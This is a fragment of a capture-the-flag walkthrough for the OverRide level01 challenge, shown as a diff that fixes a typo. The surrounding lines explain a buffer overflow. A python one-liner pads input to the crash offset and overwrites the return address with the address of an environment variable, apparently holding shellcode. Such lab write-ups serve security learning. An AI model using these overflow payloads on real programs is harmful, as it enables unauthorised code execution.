ArthurMatthys/OverRide/level01/walkthrough.md

 >Program received signal SIGSEGV, Segmentation fault.
 >0x55555555 in ?? ()

-So it segfault from byte 81 to byte 84.
+So it segfaults from byte 81 to byte 84.
 That's where we need to put the address of the environment variable found previously :

 >level01@OverRide:~$ { python -c 'print("dat_wil" * 20)'; python -c 'print("BBBB" * 20 + 3 * "\xe2\xd7\xff\xff")'; } | ./level01
 >********* ADMIN LOGIN PROMPT *********